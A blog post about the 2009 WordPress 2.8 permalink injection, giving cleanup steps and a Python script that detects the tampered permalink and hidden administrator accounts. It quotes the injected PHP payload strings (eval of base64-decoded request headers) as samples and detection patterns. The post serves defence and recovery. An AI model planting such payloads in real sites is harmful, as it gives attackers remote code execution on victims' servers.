Last updated on May 25th, 2016 at 01:28 pm

WordPress MySQL injection permalink, WP 2.8 versions security vulnerability

WordPress MySQL Injection – Permalink hack %&({${eval(base64_decode($_SERVER[HTTP_REFERER]

Just want to write up a quick post on the latest WordPress MySQL Injection that seems to have attacked many WordPress blogs, including several of my own. I just logged in to my admin panel and was surprised to see my permanent link structure injected with some extra redirect script. Weird, and now it's rectified. But I have to find a permanent fix for this issue.

I saw my URL like this:

Put your mouse cursor over a permalink (or over a post title) and see if it has the following string appearing in the URL:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

If you have this weird URI then you have been hacked! 🙁

How to Fix?

Log in to your WordPress dashboard and go to Settings -> Permalinks

Change your permalink structure to what you had before.


The next step is to remove a hidden admin user from your blog. You will most likely not be able to see who this is if you go to the Users tab:

You will be amazed to see that another user also has admin privileges. So just delete that user entry.

Now, as a preventive mechanism, I have taken away the registration system from the website for the time being.

Here is the video tutorial that explains in practice how this happens:

Solution for the nasty URL (MySQL Injection) in WP 2.8.*:

Use phpMyAdmin to browse the WordPress MySQL database tables. Go to the wp_options table and:

  •  empty the row named _transient_rewrite_rules
  •  edit the row named permalink_structure –>
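The two symptoms above (the injected permalink_structure value and the extra administrator account) can be checked for without clicking through phpMyAdmin. The script below is an added example written for this post, not code from the original post or from WordPress: it URL-decodes an option value the way the browser would (the %7B/%5B form shown earlier) and flags anything that is not a plain WordPress rewrite structure, and it lists which user_ids in wp_usermeta hold the administrator capability so an unexpected one stands out. The option and meta row names are the standard WordPress ones; the sample permalink values and usermeta rows are constructed for the demo, with user_id 7 playing the hidden admin.

```python
"""Checks for the WordPress 2.8 permalink injection described in the post.

Added example, not code from the original post or from WordPress itself.
Assumes the standard wp_options row 'permalink_structure' and the standard
wp_usermeta row 'wp_capabilities'; all sample data below is constructed.
"""
import re
from urllib.parse import unquote

# A legitimate permalink structure never contains PHP calls, superglobal
# lookups or "${" interpolation. Checked after URL-decoding so the
# %7B/%5B-encoded variant from the post is caught as well.
SUSPICIOUS = re.compile(
    r"eval\s*\(|base64_decode\s*\(|\$_SERVER\s*\[|\$\{", re.IGNORECASE
)

# Standard WordPress rewrite tags (%year%, %postname%, ...).
ALLOWED_TAGS = {
    "year", "monthnum", "day", "hour", "minute", "second",
    "post_id", "postname", "category", "author",
}
TAG_RE = re.compile(r"%([a-z_]+)%")


def decode_permalink(value: str) -> str:
    """URL-decode an option value without destroying WordPress tags.

    "%da" (from %day%) and "%ca" (from %category%) are valid hex escapes, so
    tags are shielded with NUL markers first, then the rest is decoded
    repeatedly to also unwrap double-encoded payloads.
    """
    shielded = TAG_RE.sub(lambda m: "\x00" + m.group(1) + "\x00", value)
    cur = shielded
    for _ in range(3):
        new = unquote(cur)
        if new == cur:
            break
        cur = new
    return cur.replace("\x00", "%")


def is_permalink_tampered(value: str) -> bool:
    """True if the permalink_structure value is not a clean WordPress structure."""
    decoded = decode_permalink(value)
    if SUSPICIOUS.search(decoded):
        return True
    # Beyond the known bad tokens, accept only known %tag% tokens plus
    # ordinary path characters; anything else is a red flag.
    if any(t not in ALLOWED_TAGS for t in TAG_RE.findall(decoded)):
        return True
    stripped = TAG_RE.sub("", decoded)
    return not re.fullmatch(r"[A-Za-z0-9/_\-.]*", stripped)


def find_administrators(usermeta_rows):
    """Return user_ids whose capabilities row grants 'administrator'.

    usermeta_rows: iterable of (user_id, meta_key, meta_value) as returned by
    SELECT user_id, meta_key, meta_value FROM wp_usermeta. WordPress stores
    roles as a PHP-serialized array, e.g. a:1:{s:13:"administrator";b:1;},
    so matching the serialized key is enough here.
    """
    pattern = re.compile(r's:13:"administrator";b:1;')
    return [uid for uid, key, val in usermeta_rows
            if key.endswith("capabilities") and pattern.search(val)]


def audit(permalink_value, usermeta_rows, expected_admin_ids):
    """Bundle both checks into one report mirroring the post's two symptoms."""
    admins = find_administrators(usermeta_rows)
    return {
        "permalink_tampered": is_permalink_tampered(permalink_value),
        "unexpected_admins": sorted(set(admins) - set(expected_admin_ids)),
    }


# Constructed sample data: a clean structure plus the two strings quoted in
# the post (one plain, one as the browser URL-encodes it).
SAMPLE_PERMALINKS = {
    "clean": "/%year%/%monthnum%/%day%/%postname%/",
    "injected_plain": "%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/",
    "injected_encoded": "/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%",
}
SAMPLE_USERMETA = [
    (1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),  # the real owner
    (2, "wp_capabilities", 'a:1:{s:6:"author";b:1;}'),
    (7, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),  # constructed hidden admin
]

if __name__ == "__main__":
    for name, value in SAMPLE_PERMALINKS.items():
        print(f"{name}: tampered={is_permalink_tampered(value)}")
    print(audit(SAMPLE_PERMALINKS["injected_encoded"], SAMPLE_USERMETA, {1}))
```

Against the sample data the audit reports the permalink as tampered and user_id 7 as the unexpected administrator. On a live site the same two functions would be fed the permalink_structure value from wp_options and the capabilities rows from wp_usermeta; the table prefix wp_ is the default and differs on installs that changed it.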

So always keep an eye on your WordPress 2.8.* install, because this version can be hacked at any time. I will be checking for a permanent solution soon.

WordPress responds to the attack

http://mashable.com/2009/09/05/wordpress-please-upgrade/

http://mashable.com/2009/09/05/wordpress-attack/

You know, the hacker has caused me around 14 hrs of outage 🙁 , I will track him down for sure.

This is an old post from when WordPress was on version 2.8.*. The current version of WordPress is 4.5.2 (as of 25th May 2016). This post may still be helpful or provide a tip for similar issues you might face with your blog.
